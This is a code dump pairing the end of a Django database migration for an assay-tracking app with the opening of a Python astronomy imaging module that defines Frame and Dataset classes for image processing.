field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayomicdatafileupload_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermap',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermap_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermap',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermap_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermap',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermap_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermapdatafile_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='description',
field=models.CharField(blank=True, default='file added - 20210616-14:45:48', max_length=2000, null=True),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermapdatafile_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermapdatafile_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadout',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadout_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadout',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadout_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadout',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadout_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatesetup',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatesetup_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatesetup',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatesetup_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatesetup',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatesetup_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatetestresult',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatetestresult_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatetestresult',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatetestresult_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatetestresult',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatetestresult_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayqualityindicator',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayqualityindicator_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayqualityindicator',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayqualityindicator_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayqualityindicator',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayqualityindicator_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreader',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreader_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreader',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreader_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreader',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreader_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreference',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreference_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreference',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreference_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreference',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreference_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresultfunction',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresultfunction_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresultfunction',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresultfunction_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresultfunction',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresultfunction_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresulttype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresulttype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresulttype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresulttype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresulttype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresulttype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrun',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayrun_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrun',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayrun_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrun',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayrun_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrunstakeholder',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysamplelocation',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysamplelocation_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysamplelocation',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysamplelocation_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysamplelocation',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysamplelocation_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysetting',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysetting_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysetting',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysetting_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysetting',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysetting_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudy_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudy_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='organ_model',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='microdevices.OrganModel', verbose_name='MPS Model'),
),
migrations.AlterField(
model_name='assaystudy',
name='organ_model_protocol',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='microdevices.OrganModelProtocol', verbose_name='MPS Model Version'),
),
migrations.AlterField(
model_name='assaystudy',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudy_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='study_configuration',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssayStudyConfiguration', verbose_name='Study Configuration'),
),
migrations.AlterField(
model_name='assaystudyassay',
name='study',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='assays.AssayStudy', verbose_name='Study'),
),
migrations.AlterField(
model_name='assaystudyconfiguration',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyconfiguration_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyconfiguration',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyconfiguration_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyconfiguration',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyconfiguration_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyset',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyset_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyset',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyset_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyset',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyset_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudystakeholder',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Signed Off By'),
),
migrations.AlterField(
model_name='assaysupplier',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysupplier_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysupplier',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysupplier_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysupplier',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysupplier_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaytarget',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaytarget_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaytarget',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaytarget_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaytarget',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaytarget_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaywelltype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaywelltype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaywelltype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaywelltype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaywelltype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaywelltype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='physicalunits',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physicalunits_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='physicalunits',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physicalunits_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='physicalunits',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physicalunits_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='unittype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='unittype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='unittype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='unittype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='unittype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='unittype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
]
|
UPDDI/mps-database-server
|
assays/migrations/0048.py
|
Python
|
mit
| 35,620
|
#! /usr/bin/env python
"""
Module with HCIDataset and HCIFrame classes.
"""
__author__ = 'Carlos Alberto Gomez Gonzalez'
__all__ = ['Dataset',
'Frame']
import numpy as np
import copy
import hciplot as hp
from .fits import open_fits
from .fm import (cube_inject_companions, generate_cube_copies_with_injections,
normalize_psf)
from .preproc import (frame_crop, frame_px_resampling, frame_rotate,
frame_shift, frame_center_satspots, frame_center_radon)
from .preproc import (cube_collapse, cube_crop_frames, cube_derotate,
cube_drop_frames, cube_detect_badfr_correlation,
cube_detect_badfr_pxstats, cube_detect_badfr_ellipticity,
cube_px_resampling, cube_subsample, cube_recenter_2dfit,
cube_recenter_satspots, cube_recenter_radon,
cube_recenter_dft_upsampling, cube_recenter_via_speckles)
from .var import (frame_filter_lowpass, frame_filter_highpass, frame_center,
cube_filter_highpass, cube_filter_lowpass, mask_circle)
from .stats import (frame_basic_stats, frame_histo_stats,
frame_average_radprofile, cube_basic_stats, cube_distance)
from .metrics import (frame_report, snr, snrmap, detection)
from .config.utils_conf import check_array, Saveable, print_precision
from .config.mem import check_enough_memory
class Frame(object):
""" High-contrast imaging frame (2d array).
Parameters
----------
data : numpy ndarray
2d array.
hdu : int, optional
If ``cube`` is a String, ``hdu`` indicates the HDU from the FITS file.
By default the first HDU is used.
fwhm : float, optional
The FWHM associated with this dataset (instrument dependent). Required
for several methods (operations on the cube).
"""
def __init__(self, data, hdu=0, fwhm=None):
""" HCIFrame object initialization. """
if isinstance(data, str):
self.data = open_fits(data, hdu, verbose=False)
else:
self.data = data
check_array(self.data, dim=2, msg='Image.data')
print('Frame shape: {}'.format(self.data.shape))
self.fwhm = fwhm
if self.fwhm is not None:
print('FWHM: {}'.format(self.fwhm))
def crop(self, size, xy=None, force=False):
""" Cropping the frame.
Parameters
----------
size : int, odd
Size of the subframe.
cenxy : tuple, optional
Coordinates of the center of the subframe.
force : bool, optional
Size and the size of the 2d array must be both even or odd. With
``force`` set to True this condition can be avoided.
"""
self.data = frame_crop(self.data, size, xy, force, verbose=True)
def detect_blobs(self, psf, bkg_sigma=1, method='lpeaks',
matched_filter=False, mask=True, snr_thresh=5, plot=True,
debug=False, verbose=False, save_plot=None,
plot_title=None, angscale=False):
""" Detecting blobs on the 2d array.
"""
self.detection_results = detection(self.data, psf, bkg_sigma, method,
matched_filter, mask, snr_thresh,
plot, debug, True, verbose,
save_plot, plot_title, angscale)
def filter(self, method, mode, median_size=5, kernel_size=5, fwhm_size=5,
btw_cutoff=0.2, btw_order=2, gauss_mode='conv'):
""" High/low pass filtering the frames of the image.
Parameters
----------
method : {'lp', 'hp'}
mode : {'median', 'gauss'}
{'laplacian', 'laplacian-conv', 'median-subt', 'gauss-subt', 'fourier-butter'}
"""
if method == 'hp':
self.data = frame_filter_highpass(self.data, mode, median_size,
kernel_size, fwhm_size,
btw_cutoff, btw_order)
elif method == 'lp':
self.data = frame_filter_lowpass(self.data, mode, median_size,
fwhm_size, gauss_mode)
else:
raise ValueError('Filtering mode not recognized')
print('Image successfully filtered')
def get_center(self, verbose=True):
""" Getting the coordinates of the center of the image.
Parameters
----------
verbose : bool optional
If True the center coordinates are printed out.
"""
return frame_center(self.data, verbose)
def plot(self, **kwargs):
""" Plotting the 2d array.
Parameters
----------
**kwargs : dict, optional
Parameters passed to the function ``plot_frames`` of the package
``HCIplot``.
"""
hp.plot_frames(self.data, **kwargs)
def radial_profile(self, sep=1):
""" Calculates the average radial profile of an image.
Parameters
----------
sep : int, optional
The average radial profile is recorded every ``sep`` pixels.
"""
radpro = frame_average_radprofile(self.data, sep=sep, plot=True)
return radpro
def recenter(self, method='satspots', xy=None, subi_size=19, sigfactor=6,
imlib='vip-fft', interpolation='lanczos4', debug=False,
verbose=True):
""" Recentering the frame using the satellite spots or a radon
transform.
Parameters
----------
method : {'satspots', 'radon'}, str optional
Method for recentering the frame.
xy : tuple, optional
Tuple with coordinates X,Y of the satellite spots. When the spots
are in an X configuration, the order is the following: top-left,
top-right, bottom-left and bottom-right. When the spots are in an
+ (cross-like) configuration, the order is the following: top,
right, left, bottom.
"""
if method == 'satspots':
if xy is None:
raise ValueError('`xy` must be a tuple of 4 tuples')
self.data, _, _ = frame_center_satspots(self.data, xy, subi_size,
sigfactor, True, imlib,
interpolation, debug,
verbose)
elif method == 'radon':
pass
# self.data = frame_center_radon()
else:
raise ValueError('Recentering method not recognized')
def rescale(self, scale, imlib='vip-fft', interpolation='bicubic',
verbose=True):
""" Resampling the image (upscaling or downscaling).
Parameters
----------
scale : int, float or tuple
Scale factor for upsampling or downsampling the frames in the cube.
If a tuple it corresponds to the scale along x and y.
imlib : {'ndimage', 'opencv', 'vip-fft'}, str optional
Library used for image transformations. ndimage is the default.
interpolation : str, optional
For 'ndimage' library: 'nearneig', bilinear', 'bicuadratic',
'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
is the fastest and the 'biquintic' the slowest. The 'nearneig' is
the worst option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate.
verbose : bool, optional
Whether to print out additional info such as the new image shape.
"""
self.data = frame_px_resampling(self.data, scale, imlib, interpolation,
verbose)
def rotate(self, angle, imlib='opencv', interpolation='lanczos4', cxy=None):
""" Rotating the image by a given ``angle``.
Parameters
----------
imlib : {'opencv', 'skimage', 'vip-fft'}, str optional
Library used for image transformations. Opencv is faster than
ndimage or skimage.
interpolation : str, optional
For 'skimage' library: 'nearneig', bilinear', 'bicuadratic',
'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
is the fastest and the 'biquintic' the slowest. The 'nearneig' is
the poorer option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate. 'lanczos4' is the default.
cxy : tuple of int, optional
Coordinates X,Y of the point with respect to which the rotation
will be performed. By default the rotation is done with respect to
the center of the frames, as it is returned by the function
vip_hci.var.frame_center.
"""
self.data = frame_rotate(self.data, angle, imlib, interpolation, cxy)
print('Image successfully rotated')
def shift(self, shift_y, shift_x, imlib='vip-fft', interpolation='lanczos4'):
""" Shifting the image.
Parameters
----------
shift_y, shift_x: float
Shifts in x and y directions.
imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
Library or method used for performing the image shift.
'ndimage-fourier', does a fourier shift operation and preserves
better the pixel values (therefore the flux and photometry).
Interpolation based shift ('opencv' and 'ndimage-interp') is faster
than the fourier shift. 'opencv' is recommended when speed is
critical.
interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
Only used in case of imlib is set to 'opencv' or 'ndimage-interp',
where the images are shifted via interpolation.
For 'ndimage-interp' library: 'nearneig', bilinear', 'bicuadratic',
'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation is
the fastest and the 'biquintic' the slowest. The 'nearneig' is the
poorer option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate. 'lanczos4' is the default.
"""
self.data = frame_shift(self.data, shift_y, shift_x, imlib,
interpolation)
print('Image successfully shifted')
def snr(self, source_xy, plot=False, verbose=True):
""" Calculating the S/N for a test resolution element ``source_xy``.
Parameters
----------
source_xy : tuple of floats
X and Y coordinates of the planet or test speckle.
plot : bool, optional
Plots the frame and the apertures considered for clarity.
verbose : bool, optional
Chooses whether to print some output or not.
Returns
-------
snr_val : float
Value of the S/N for ``source_xy``.
"""
if self.fwhm is None:
raise ValueError('FWHM has not been set')
return snr(self.data, source_xy, self.fwhm, False, plot, verbose)
def stats(self, region='circle', radius=5, xy=None, annulus_inner_radius=0,
annulus_width=5, source_xy=None, verbose=True, plot=True):
""" Calculating statistics on the image, both in the full-frame and in
a region (circular aperture or annulus). Also, the S/N of the either
``source_xy`` or the max pixel is calculated.
Parameters
----------
region : {'circle', 'annulus'}, str optional
Region in which basic statistics (mean, stddev, median and max) are
calculated.
radius : int, optional
Radius of the circular aperture.
xy : tuple of floats, optional
Center of the circular aperture.
annulus_inner_radius : int, optional
Inner radius of the annular region.
annulus_width : int, optional
Width of the annular region.
source_xy : tuple of floats, optional
Coordinates for which the S/N information will be obtained. If None,
the S/N is estimated for the pixel with the maximum value.
verbose : bool, optional
Whether to print out the values of the calculated statistics.
plot : bool, optional
Whether to plot the frame, histograms and region.
"""
res_region = frame_basic_stats(self.data, region, radius, xy,
annulus_inner_radius, annulus_width,
plot, True)
if verbose:
if region == 'circle':
msg = 'Stats in circular aperture of radius: {}pxs'
print(msg.format(radius))
elif region == 'annulus':
msg = 'Stats in annulus. Inner_rad: {}pxs, width: {}pxs'
print(msg.format(annulus_inner_radius, annulus_width))
mean, std_dev, median, maxi = res_region
msg = 'Mean: {:.3f}, Stddev: {:.3f}, Median: {:.3f}, Max: {:.3f}'
print(msg.format(mean, std_dev, median, maxi))
res_ff = frame_histo_stats(self.data, plot)
if verbose:
mean, median, std, maxim, minim = res_ff
print('Stats in the whole frame:')
msg = 'Mean: {:.3f}, Stddev: {:.3f}, Median: {:.3f}, Max: {:.3f}, '
msg += 'Min: {:.3f}'
print(msg.format(mean, std, median, maxim, minim))
print('\nS/N info:')
_ = frame_report(self.data, self.fwhm, source_xy, verbose)
class Dataset(Saveable):
""" High-contrast imaging dataset class.
Parameters
----------
cube : str or numpy array
3d or 4d high-contrast image sequence. If a string is provided, cube is
interpreted as the path of the FITS file containing the sequence.
hdu : int, optional
If ``cube`` is a String, ``hdu`` indicates the HDU from the FITS file.
By default the first HDU is used.
angles : list or numpy array, optional
The vector of parallactic angles.
wavelengths : list or numpy array, optional
The vector of wavelengths (to be used as scaling factors).
fwhm : float, optional
The FWHM associated with this dataset (instrument dependent). Required
for several methods (operations on the cube).
px_scale : float, optional
The pixel scale associated with this dataset (instrument dependent).
psf : numpy array, optional
The PSF template associated with this dataset.
psfn : numpy array, optional
Normalized/cropped/centered version of the PSF template associated with
this dataset.
cuberef : str or numpy array
3d or 4d high-contrast image sequence. To be used as a reference cube.
"""
_saved_attributes = ["cube", "psf", "psfn", "angles", "fwhm", "wavelengths",
"px_scale", "cuberef", "injections_yx"]
def __init__(self, cube, hdu=0, angles=None, wavelengths=None, fwhm=None,
px_scale=None, psf=None, psfn=None, cuberef=None):
""" Initialization of the HCIDataset object.
"""
# Loading the 3d/4d cube or image sequence
if isinstance(cube, str):
self.cube = open_fits(cube, hdu, verbose=False)
elif isinstance(cube, np.ndarray):
if not (cube.ndim == 3 or cube.ndim == 4):
raise ValueError('`Cube` array has wrong dimensions')
self.cube = cube
else:
raise TypeError('`Cube` has a wrong type')
print('Cube array shape: {}'.format(self.cube.shape))
if self.cube.ndim == 3:
self.n, self.y, self.x = self.cube.shape
self.w = 1
elif self.cube.ndim == 4:
self.w, self.n, self.y, self.x = self.cube.shape
# Loading the reference cube
if isinstance(cuberef, str):
self.cuberef = open_fits(cuberef, hdu, verbose=False)
elif isinstance(cuberef, np.ndarray):
msg = '`Cuberef` array has wrong dimensions'
if not cuberef.ndim == 3:
raise ValueError(msg)
if not cuberef.shape[1] == self.y:
raise ValueError(msg)
self.cuberef = cuberef
elif isinstance(cuberef, Dataset):
msg = '`Cuberef` array has wrong dimensions'
if not cuberef.cube.ndim == 3:
raise ValueError(msg)
if not cuberef.cube.shape[1] == self.y:
raise ValueError(msg)
self.cuberef = cuberef.cube
else:
self.cuberef = None
if self.cuberef is not None:
print('Cuberef array shape: {}'.format(self.cuberef.shape))
# Loading the angles (ADI)
if isinstance(angles, str):
self.angles = open_fits(angles, verbose=False)
else:
self.angles = angles
if self.angles is not None:
print('Angles array shape: {}'.format(self.angles.shape))
# Checking the shape of the angles vector
check_array(self.angles, dim=1, msg='Parallactic angles vector')
if not self.angles.shape[0] == self.n:
raise ValueError('Parallactic angles vector has a wrong shape')
# Loading the scaling factors (mSDI)
if isinstance(wavelengths, str):
self.wavelengths = open_fits(wavelengths, verbose=False)
else:
self.wavelengths = wavelengths
if self.wavelengths is not None:
print('Wavelengths array shape: {}'.format(self.wavelengths.shape))
# Checking the shape of the scaling vector
check_array(self.wavelengths, dim=1, msg='Wavelengths vector')
if not self.wavelengths.shape[0] == self.w:
raise ValueError('Wavelengths vector has a wrong shape')
# Loading the PSF
if isinstance(psf, str):
self.psf = open_fits(psf, verbose=False)
else:
self.psf = psf
if self.psf is not None:
print('PSF array shape: {}'.format(self.psf.shape))
# Checking the shape of the PSF array
if not self.psf.ndim == self.cube.ndim - 1:
msg = 'PSF array has a wrong shape. Must have {} dimensions, '
msg += 'got {} instead'
raise ValueError(msg.format(self.cube.ndim - 1, self.psf.ndim))
# Loading the normalized PSF
if isinstance(psfn, str):
self.psfn = open_fits(psfn, verbose=False)
else:
self.psfn = psfn
if self.psfn is not None:
print('Normalized PSF array shape: {}'.format(self.psfn.shape))
# Checking the shape of the PSF array
if not self.psfn.ndim == self.cube.ndim - 1:
msg = 'Normalized PSF array has a wrong shape. Must have {} '
msg += 'dimensions, got {} instead'
raise ValueError(msg.format(self.cube.ndim - 1, self.psfn.ndim))
self.fwhm = fwhm
if self.fwhm is not None:
if self.cube.ndim == 4:
check_array(self.fwhm, dim=1, msg='FHWM')
elif self.cube.ndim == 3:
print('FWHM: {}'.format(self.fwhm))
self.px_scale = px_scale
if self.px_scale is not None:
print('Pixel/plate scale: {}'.format(self.px_scale))
self.injections_yx = None
def collapse(self, mode='median', n=50):
""" Collapsing the sequence into a 2d array.
"""
frame = cube_collapse(self.cube, mode, n)
print('Cube successfully collapsed')
return Frame(frame)
def crop_frames(self, size, xy=None, force=False):
""" Cropping the frames of the sequence (3d or 4d cube).
Parameters
----------
size : int
New size of the (square) frames.
xy : tuple of ints
X, Y coordinates of new frame center. If you are getting the
coordinates from ds9 subtract 1, python has 0-based indexing.
force : bool, optional
``Size`` and the original size of the frames must be both even or
odd. With ``force`` set to True this condition can be avoided.
"""
self.cube = cube_crop_frames(self.cube, size, xy, force, verbose=True)
def derotate(self, imlib='vip-fft', interpolation='lanczos4', cxy=None,
nproc=1, border_mode='constant', mask_val=np.nan,
edge_blend=None, interp_zeros=False, ker=1):
